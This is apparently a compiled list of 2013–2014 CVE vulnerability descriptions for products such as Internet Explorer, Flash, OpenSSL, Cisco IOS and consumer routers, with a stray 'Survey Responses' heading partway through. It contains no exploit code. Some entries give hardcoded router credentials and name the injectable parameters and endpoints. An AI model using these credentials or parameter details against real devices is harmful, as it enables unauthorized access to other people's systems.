CVE-2013-5828: Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control EM Base Platform 10.2.0.5 and 11.1.0.1, EM DB Control 11.1.0.7, 11.2.0.2, and 11.2.0.3, and EM Plugin for DB 12.1.0.2 and 12.1.0.3 allows remote attackers to affect integrity via unknown vectors related to Storage Management.

CVE-2013-6167: Mozilla Firefox through 27 sends HTTP Cookie headers without first validating that they have the required character-set restrictions, which allows remote attackers to conduct the equivalent of a persistent Logout CSRF attack via a crafted parameter that forces a web application to set a malformed cookie within an HTTP response.

CVE-2013-6188: Cross-site request forgery (CSRF) vulnerability in HP System Management Homepage (SMH) 7.1 through 7.2.2 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.

CVE-2013-6284: Unspecified vulnerability in the Statutory Reporting for Insurance (FS-SR) component in the Financial Services module for SAP ERP Central Component (ECC) allows attackers to execute arbitrary code via unspecified vectors, related to a "code injection vulnerability."

CVE-2013-6396: The OpenStack Python client library for Swift (python-swiftclient) 1.0 through 1.9.0 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2013-6475: Multiple integer overflows in (1) OPVPOutputDev.cxx and (2) oprs/OPVPSplash.cxx in the pdftoopvp filter in CUPS and cups-filters before 1.0.47 allow remote attackers to execute arbitrary code via a crafted PDF file, which triggers a heap-based buffer overflow.

CVE-2013-6660: The drag-and-drop implementation in Google Chrome before 33.0.1750.117 does not properly restrict the information in WebDropData data structures, which allows remote attackers to discover full pathnames via a crafted web site.

CVE-2013-6699: The Control and Provisioning of Wireless Access Points (CAPWAP) protocol implementation on Cisco Wireless LAN Controller (WLC) devices allows remote attackers to cause a denial of service via a crafted CAPWAP packet that triggers a buffer over-read, aka Bug ID CSCuh81880.

CVE-2013-6702: The management implementation on Cisco ONS 15454 controller cards with software 9.8 and earlier allows remote attackers to cause a denial of service (card reset) via crafted packets, aka Bug ID CSCtz50902.

CVE-2013-6979: The VTY authentication implementation in Cisco IOS XE 03.02.xx.SE and 03.03.xx.SE incorrectly relies on the Linux-IOS internal-network configuration, which allows remote attackers to bypass authentication by leveraging access to a 192.168.x.2 source IP address, aka Bug ID CSCuj90227.

CVE-2013-6994: OpenText Exceed OnDemand (EoD) 8 transmits the session ID in cleartext, which allows remote attackers to perform session fixation attacks by sniffing the network.

CVE-2013-7004: D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 have a hardcoded account of username gkJ9232xXyruTRmY, which makes it easier for remote attackers to obtain access by leveraging knowledge of the username.

CVE-2013-7043: Multiple cross-site request forgery (CSRF) vulnerabilities on Cisco Scientific Atlanta DPR2320R2 routers with software 2.0.2r1262-090417 allow remote attackers to hijack the authentication of administrators for requests that (1) change a password via the Password parameter to goform/RgSecurity, (2) reboot the device via the Restart parameter to goform/restart, (3) modify Wi-Fi settings, as demonstrated by the WpaPreSharedKey parameter to goform/wlanSecurity, or (4) modify parental controls via the ParentalPassword parameter to goform/RgParentalBasic.

CVE-2013-7389: Multiple cross-site scripting (XSS) vulnerabilities in D-Link DIR-645 Router (Rev. A1) with firmware before 1.04B11 allow remote attackers to inject arbitrary web script or HTML via the (1) deviceid parameter to parentalcontrols/bind.php, (2) RESULT parameter to info.php, or (3) receiver parameter to bsc_sms_send.php.

CVE-2014-0001: Buffer overflow in client/mysql.cc in Oracle MySQL and MariaDB before 5.5.35 allows remote database servers to cause a denial of service (crash) and possibly execute arbitrary code via a long server version string.

CVE-2014-0035: The SymmetricBinding in Apache CXF before 2.6.13 and 2.7.x before 2.7.10, when EncryptBeforeSigning is enabled and the UsernameToken policy is set to an EncryptedSupportingToken, transmits the UsernameToken in cleartext, which allows remote attackers to obtain sensitive information by sniffing the network.

CVE-2014-0160: The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.

CVE-2014-0207: The cdf_read_short_sector function in cdf.c in file before 5.19, as used in the Fileinfo component in PHP before 5.4.30 and 5.5.x before 5.5.14, allows remote attackers to cause a denial of service (assertion failure and application exit) via a crafted CDF file.

CVE-2014-0259: Microsoft Word 2007 SP3 and Office Compatibility Pack SP3 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability."

CVE-2014-0266: The XMLHTTP ActiveX controls in XML Core Services 3.0 in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to bypass the Same Origin Policy via a web page that is visited in Internet Explorer, aka "MSXML Information Disclosure Vulnerability."

CVE-2014-0294: Microsoft Forefront Protection 2010 for Exchange Server does not properly parse e-mail content, which might allow remote attackers to execute arbitrary code via a crafted message, aka "RCE Vulnerability."

CVE-2014-0313: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-0321.

CVE-2014-0354: The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 1.00(BFQ.6)C0 has a hardcoded password of qweasdzxc for an unspecified account, which allows remote attackers to obtain index.asp login access via an HTTP request.

CVE-2014-0362: Cross-site scripting (XSS) vulnerability on Google Search Appliance (GSA) devices before 7.0.14.G.216 and 7.2 before 7.2.0.G.114, when dynamic navigation is configured, allows remote attackers to inject arbitrary web script or HTML via input included in a SCRIPT element.

CVE-2014-0433: Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.13 and earlier allows remote attackers to affect availability via unknown vectors related to Thread Pooling.

CVE-2014-0488: APT before 1.0.9 does not "invalidate repository data" when moving from an unauthenticated to authenticated state, which allows remote attackers to have unspecified impact via crafted repository data.

CVE-2014-0493: Adobe Reader and Acrobat 10.x before 10.1.9 and 11.x before 11.0.06 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-0495.

CVE-2014-0494: Adobe Digital Editions 2.0.1 allows attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via unspecified vectors.

CVE-2014-0498: Stack-based buffer overflow in Adobe Flash Player before 11.7.700.269 and 11.8.x through 12.0.x before 12.0.0.70 on Windows and Mac OS X and before 11.2.202.341 on Linux, Adobe AIR before 4.0.0.1628 on Android, Adobe AIR SDK before 4.0.0.1628, and Adobe AIR SDK & Compiler before 4.0.0.1628 allows attackers to execute arbitrary code via unspecified vectors.

CVE-2014-0515: Buffer overflow in Adobe Flash Player before 11.7.700.279 and 11.8.x through 13.0.x before 13.0.0.206 on Windows and OS X, and before 11.2.202.356 on Linux, allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in April 2014.

CVE-2014-0533: Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2014-0531 and CVE-2014-0532.

CVE-2014-0536: Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors.

CVE-2014-0562: Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 10.x before 10.1.12 and 11.x before 11.0.09 on OS X allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "Universal XSS (UXSS)."

CVE-2014-0577: Adobe Flash Player before 13.0.0.252 and 14.x and 15.x before 15.0.0.223 on Windows and OS X and before 11.2.202.418 on Linux, Adobe AIR before 15.0.0.356, Adobe AIR SDK before 15.0.0.356, and Adobe AIR SDK & Compiler before 15.0.0.356 allow attackers to execute arbitrary code by leveraging an unspecified "type confusion," a different vulnerability than CVE-2014-0584, CVE-2014-0585, CVE-2014-0586, and CVE-2014-0590.

CVE-2014-0765: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long GotoCmd argument.

CVE-2014-0767: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long AccessCode argument.

CVE-2014-0783: Stack-based buffer overflow in BKHOdeq.exe in Yokogawa CENTUM CS 3000 R3.09.50 and earlier allows remote attackers to execute arbitrary code via a crafted TCP packet.

CVE-2014-1330: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.

CVE-2014-1342: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.

CVE-2014-1349: Use-after-free vulnerability in Safari in Apple iOS before 7.1.2 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an invalid URL.

CVE-2014-1356: Heap-based buffer overflow in launchd in Apple iOS before 7.1.2, Apple OS X before 10.9.4, and Apple TV before 6.1.2 allows attackers to execute arbitrary code via a crafted application that sends IPC messages.

CVE-2014-1370: The byte-swapping implementation in copyfile in Apple OS X before 10.9.4 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds memory access and application crash) via a crafted AppleDouble file in a ZIP archive.

CVE-2014-1379: Graphics Drivers in Apple OS X before 10.9.4 allows attackers to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via a 32-bit executable file for a crafted application.

CVE-2014-1382: WebKit, as used in Apple iOS before 7.1.2, Apple Safari before 6.1.5 and 7.x before 7.0.5, and Apple TV before 6.1.2, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-06-30-1, APPLE-SA-2014-06-30-3, and APPLE-SA-2014-06-30-4.

CVE-2014-1466: SQL injection vulnerability in CSP MySQL User Manager 2.3 allows remote attackers to execute arbitrary SQL commands via the login field of the login page.

CVE-2014-1472: Multiple cross-site scripting (XSS) vulnerabilities in the Enterprise Manager in McAfee Vulnerability Manager (MVM) 7.5.5 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.

CVE-2014-1477: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 27.0, Firefox ESR 24.x before 24.3, Thunderbird before 24.3, and SeaMonkey before 2.24 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2014-1518: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 29.0, Firefox ESR 24.x before 24.5, Thunderbird before 24.5, and SeaMonkey before 2.26 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2014-1563: Use-after-free vulnerability in the mozilla::DOMSVGLength::GetTearOff function in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via an SVG animation with DOM interaction that triggers incorrect cycle collection.

CVE-2014-1565: The mozilla::dom::AudioEventTimeline function in the Web Audio API implementation in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 does not properly create audio timelines, which allows remote attackers to obtain sensitive information from process memory or cause a denial of service (out-of-bounds read) via crafted API calls.

CVE-2014-1586: content/base/src/nsDocument.cpp in Mozilla Firefox before 33.0, Firefox ESR 31.x before 31.2, and Thunderbird 31.x before 31.2 does not consider whether WebRTC video sharing is occurring, which allows remote attackers to obtain sensitive information from the local camera in certain IFRAME situations by maintaining a session after the user temporarily navigates away.

CVE-2014-1701: The GenerateFunction function in bindings/scripts/code_generator_v8.pm in Blink, as used in Google Chrome before 33.0.1750.149, does not implement a certain cross-origin restriction for the EventTarget.dispatchEvent function, which allows remote attackers to conduct Universal XSS (UXSS) attacks via vectors involving events.

CVE-2014-1740: Multiple use-after-free vulnerabilities in net/websockets/websocket_job.cc in the WebSockets implementation in Google Chrome before 34.0.1847.137 allow remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to WebSocketJob deletion.

CVE-2014-1744: Integer overflow in the AudioInputRendererHost::OnCreateStream function in content/browser/renderer_host/media/audio_input_renderer_host.cc in Google Chrome before 35.0.1916.114 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger a large shared-memory allocation.

CVE-2014-1753: Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-1806: The .NET Remoting implementation in Microsoft .NET Framework 1.1 SP1, 2.0 SP2, 3.5, 3.5.1, 4, 4.5, and 4.5.1 does not properly restrict memory access, which allows remote attackers to execute arbitrary code via vectors involving malformed objects, aka "TypeFilterLevel Vulnerability."

CVE-2014-1808: Microsoft Office 2013 Gold, SP1, RT, and RT SP1 allows remote attackers to obtain sensitive token information via a web site that sends a crafted response during opening of an Office document, aka "Token Reuse Vulnerability."

CVE-2014-1811: The TCP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to cause a denial of service (non-paged pool memory consumption and system hang) via malformed data in the Options field of a TCP header, aka "TCP Denial of Service Vulnerability."

CVE-2014-1812: The Group Policy implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 does not properly handle distribution of passwords, which allows remote authenticated users to obtain sensitive credential information and consequently gain privileges by leveraging access to the SYSVOL share, as exploited in the wild in May 2014, aka "Group Policy Preferences Password Elevation of Privilege Vulnerability."

CVE-2014-2014: imapsync before 1.584, when running with the --tls option, attempts a cleartext login when a certificate verification failure occurs, which allows remote attackers to obtain credentials by sniffing the network.

CVE-2014-2103: Cisco Intrusion Prevention System (IPS) Software allows remote attackers to cause a denial of service (MainApp process outage) via malformed SNMP packets, aka Bug IDs CSCum52355 and CSCul49309.

CVE-2014-2109: The TCP Input module in Cisco IOS 12.2 through 12.4 and 15.0 through 15.4, when NAT is used, allows remote attackers to cause a denial of service (memory consumption or device reload) via crafted TCP packets, aka Bug IDs CSCuh33843 and CSCuj41494.

CVE-2014-2364: Multiple stack-based buffer overflows in Advantech WebAccess before 7.2 allow remote attackers to execute arbitrary code via a long string in the (1) ProjectName, (2) SetParameter, (3) NodeName, (4) CCDParameter, (5) SetColor, (6) AlarmImage, (7) GetParameter, (8) GetColor, (9) ServerResponse, (10) SetBaud, or (11) IPAddress parameter to an ActiveX control in (a) webvact.ocx, (b) dvs.ocx, or (c) webdact.ocx.

CVE-2014-2416: Unspecified vulnerability in the Oracle Data Integrator component in Oracle Fusion Middleware 11.1.1.3.0 allows remote attackers to affect availability via unknown vectors related to Data Quality, a different vulnerability than CVE-2014-2407, CVE-2014-2415, CVE-2014-2417, and CVE-2014-2418.

CVE-2014-2554: OTRS 3.1.x before 3.1.21, 3.2.x before 3.2.16, and 3.3.x before 3.3.6 allows remote attackers to conduct clickjacking attacks via an IFRAME element.

CVE-2014-2643: Unspecified vulnerability in HP Systems Insight Manager (SIM) before 7.4 allows remote authenticated users to gain privileges via unknown vectors.

CVE-2014-2742: Isode M-Link before 16.0v7 does not properly restrict the processing of compressed XML elements, which allows remote attackers to cause a denial of service (resource consumption) via a crafted XMPP stream, aka an "xmppbomb" attack.

CVE-2014-2768: Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2773.

CVE-2014-2789: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2795, CVE-2014-2798, and CVE-2014-2804.


CVE-2014-2791: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-2794: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2788.

CVE-2014-2808: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2796, CVE-2014-2825, CVE-2014-4050, CVE-2014-4055, and CVE-2014-4067.

CVE-2014-2821: Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-3444: The GetGUID function in codecs/dmp4.dll in RealNetworks RealPlayer 16.0.3.51 and earlier allows remote attackers to execute arbitrary code or cause a denial of service (write access violation and application crash) via a malformed 3gp file.

CVE-2014-3489: lib/util/miq-password.rb in Red Hat CloudForms 3.0 Management Engine (CFME) before 5.2.4.2 uses a hard-coded salt, which makes it easier for remote attackers to guess passwords via a brute force attack.

CVE-2014-3507: Memory leak in d1_both.c in the DTLS implementation in OpenSSL 0.9.8 before 0.9.8zb, 1.0.0 before 1.0.0n, and 1.0.1 before 1.0.1i allows remote attackers to cause a denial of service (memory consumption) via zero-length DTLS fragments that trigger improper handling of the return value of a certain insert function.

CVE-2014-3556: The STARTTLS implementation in mail/ngx_mail_smtp_handler.c in the SMTP proxy in nginx 1.5.x and 1.6.x before 1.6.1 and 1.7.x before 1.7.4 does not properly restrict I/O buffering, which allows man-in-the-middle attackers to insert commands into encrypted SMTP sessions by sending a cleartext command that is processed after TLS is in place, related to a "plaintext command injection" attack, a similar issue to CVE-2011-0411.

CVE-2014-3580: The mod_dav_svn Apache HTTPD server module in Apache Subversion 1.x before 1.7.19 and 1.8.x before 1.8.11 allows remote attackers to cause a denial of service (NULL pointer dereference and server crash) via a REPORT request for a resource that does not exist.

CVE-2014-3814: The Juniper Networks NetScreen Firewall devices with ScreenOS before 6.3r17, when configured to use the internal DNS lookup client, allows remote attackers to cause a denial of service (crash and reboot) via a sequence of malformed packets to the device IP.

CVE-2014-3819: Juniper Junos 11.4 before 11.4R12, 12.1 before 12.1R10, 12.1X44 before 12.1X44-D35, 12.1X45 before 12.1X45-D25, 12.1X46 before 12.1X46-D20, 12.1X47 before 12.1X47-D10, 12.2 before 12.2R8, 12.3 before 12.3R7, 13.1 before 13.1R4, 13.2 before 13.2R4, 13.3 before 13.3R2, and 14.1 before 14.1R1, when Auto-RP is enabled, allows remote attackers to cause a denial of service (RDP routing process crash and restart) via a malformed PIM packet.

CVE-2014-3872: Multiple SQL injection vulnerabilities in the administration login page in D-Link DAP-1350 (Rev. A1) with firmware 1.14 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) username or (2) password.

CVE-2014-4044: OpenAFS 1.6.8 does not properly clear the fields in the host structure, which allows remote attackers to cause a denial of service (uninitialized memory access and crash) via unspecified vectors related to TMAY requests.

CVE-2014-4079: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4082: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-4100: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4105: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4114: Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to execute arbitrary code via a crafted OLE object in an Office document, as exploited in the wild with a "Sandworm" attack in June through October 2014, aka "Windows OLE Remote Code Execution Vulnerability."

CVE-2014-4127: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-4130: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4132 and CVE-2014-4138.

CVE-2014-4132: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4130 and CVE-2014-4138.

CVE-2014-4133: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-4137.

CVE-2014-4141: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-4481: Integer overflow in CoreGraphics in Apple iOS before 8.1.3, Apple OS X before 10.10.2, and Apple TV before 7.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PDF document.

CVE-2014-4617: The do_uncompress function in g10/compress.c in GnuPG 1.x before 1.4.17 and 2.x before 2.0.24 allows context-dependent attackers to cause a denial of service (infinite loop) via malformed compressed packets, as demonstrated by an a3 01 5b ff byte sequence.

CVE-2014-4631: RSA Adaptive Authentication (On-Premise) 6.0.2.1 through 7.1 P3, when using device binding in a Challenge SOAP call or using the RSA Adaptive Authentication Integration Adapters with Out-of-Band Phone (Authentify) functionality, conducts permanent device binding even when authentication fails, which allows remote attackers to bypass authentication.

CVE-2014-5528: The Appsflyer library for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2014-6040: GNU C Library (aka glibc) before 2.20 allows context-dependent attackers to cause a denial of service (out-of-bounds read and crash) via a multibyte character value of "0xffff" to the iconv function when converting (1) IBM933, (2) IBM935, (3) IBM937, (4) IBM939, or (5) IBM1364 encoded data to UTF-8.

CVE-2014-6105: IBM Security Identity Manager 6.x before 6.0.0.3 IF14 allows remote attackers to conduct clickjacking attacks via unspecified vectors.

CVE-2014-6136: IBM Security AppScan Standard 8.x and 9.x before 9.0.1.1 FP1 supports unencrypted sessions, which allows remote attackers to obtain sensitive information by sniffing the network.

CVE-2014-6164: IBM WebSphere Application Server 8.0.x before 8.0.0.10 and 8.5.x before 8.5.5.4 allows remote attackers to spoof OpenID and OpenID Connect cookies, and consequently obtain sensitive information, via a crafted URL.

CVE-2014-6363: vbscript.dll in Microsoft VBScript 5.6 through 5.8, as used with Internet Explorer 6 through 11 and other products, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "VBScript Memory Corruption Vulnerability."

CVE-2014-6369: Microsoft Internet Explorer 9 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability."

CVE-2014-6378: Juniper Junos 11.4 before R12-S4, 12.1X44 before D35, 12.1X45 before D30, 12.1X46 before D25, 12.1X47 before D10, 12.2 before R9, 12.2X50 before D70, 12.3 before R7, 13.1 before R4 before S3, 13.1X49 before D55, 13.1X50 before D30, 13.2 before R5, 13.2X50 before D20, 13.2X51 before D26 and D30, 13.2X52 before D15, 13.3 before R3, and 14.1 before R1 allows remote attackers to cause a denial of service (router protocol daemon crash) via a crafted RSVP PATH message.

CVE-2014-6487: Unspecified vulnerability in the Oracle Identity Manager component in Oracle Fusion Middleware 11.1.1.5, 11.1.1.7, 11.1.2.1, and 11.1.2.2 allows remote authenticated users to affect integrity via unknown vectors related to End User Self Service.

CVE-2014-7250: The TCP stack in 4.3BSD Net/2, as used in FreeBSD 5.4, NetBSD possibly 2.0, and OpenBSD possibly 3.6, does not properly implement the session timer, which allows remote attackers to cause a denial of service (resource consumption) via crafted packets.

CVE-2014-7927: The SimplifiedLowering::DoLoadBuffer function in compiler/simplified-lowering.cc in Google V8, as used in Google Chrome before 40.0.2214.91, does not properly choose an integer data type, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted JavaScript code.

CVE-2014-7945: OpenJPEG before r2908, as used in PDFium in Google Chrome before 40.0.2214.91, allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted PDF document, related to j2k.c, jp2.c, and t2.c.

CVE-2014-8447: Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-8445, CVE-2014-8446, CVE-2014-8456, CVE-2014-8458, CVE-2014-8459, CVE-2014-8461, and CVE-2014-9158.

CVE-2014-8638: The navigator.sendBeacon implementation in Mozilla Firefox before 35.0, Firefox ESR 31.x before 31.4, Thunderbird before 31.4, and SeaMonkey before 2.32 omits the CORS Origin header, which allows remote attackers to bypass intended CORS access-control checks and conduct cross-site request forgery (CSRF) attacks via a crafted web site.

CVE-2014-8835: The xpc_data_get_bytes function in libxpc in Apple OS X before 10.10.2 does not verify that a dictionary's Attributes key has the xpc_data data type, which allows attackers to execute arbitrary code by providing a crafted dictionary to sysmond, related to an "XPC type confusion" issue.

CVE-2014-9159: Heap-based buffer overflow in Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2014-8457 and CVE-2014-8460.

CVE-2014-9163: Stack-based buffer overflow in Adobe Flash Player before 13.0.0.259 and 14.x and 15.x before 15.0.0.246 on Windows and OS X and before 11.2.202.425 on Linux allows attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in December 2014.

CVE-2014-9350: TP-Link TL-WR740N 4 with firmware 3.17.0 Build 140520, 3.16.6 Build 130529, and 3.16.4 Build 130205 allows remote attackers to cause a denial of service (httpd crash) via vectors involving a "new" value in the isNew parameter to PingIframeRpm.htm.

CVE-2014-9357: Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build in a Dockerfile in an LZMA (.xz) archive, related to the chroot for archive extraction.


Survey Responses


CVE-2013-1144: Memory leak in the IKEv1 implementation in Cisco IOS 15.1 allows remote attackers to cause a denial of service (memory consumption) via unspecified (1) IPv4 or (2) IPv6 IKE packets, aka Bug ID CSCth81055.

CVE-2013-1153: Cross-site request forgery (CSRF) vulnerability in the web interface in Cisco Prime Infrastructure allows remote attackers to hijack the authentication of arbitrary users, aka Bug ID CSCue84676.

CVE-2013-1181: Cisco NX-OS on Nexus 5500 devices 4.x and 5.x before 5.0(3)N2(2), Nexus 3000 devices 5.x before 5.0(3)U3(2), and Unified Computing System (UCS) 6200 devices before 2.0(1w) allows remote attackers to cause a denial of service (device reload) by sending a jumbo packet to the management interface, aka Bug IDs CSCtx17544, CSCts10593, and CSCtx95389.

CVE-2013-1303: Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-1304 and CVE-2013-1338.

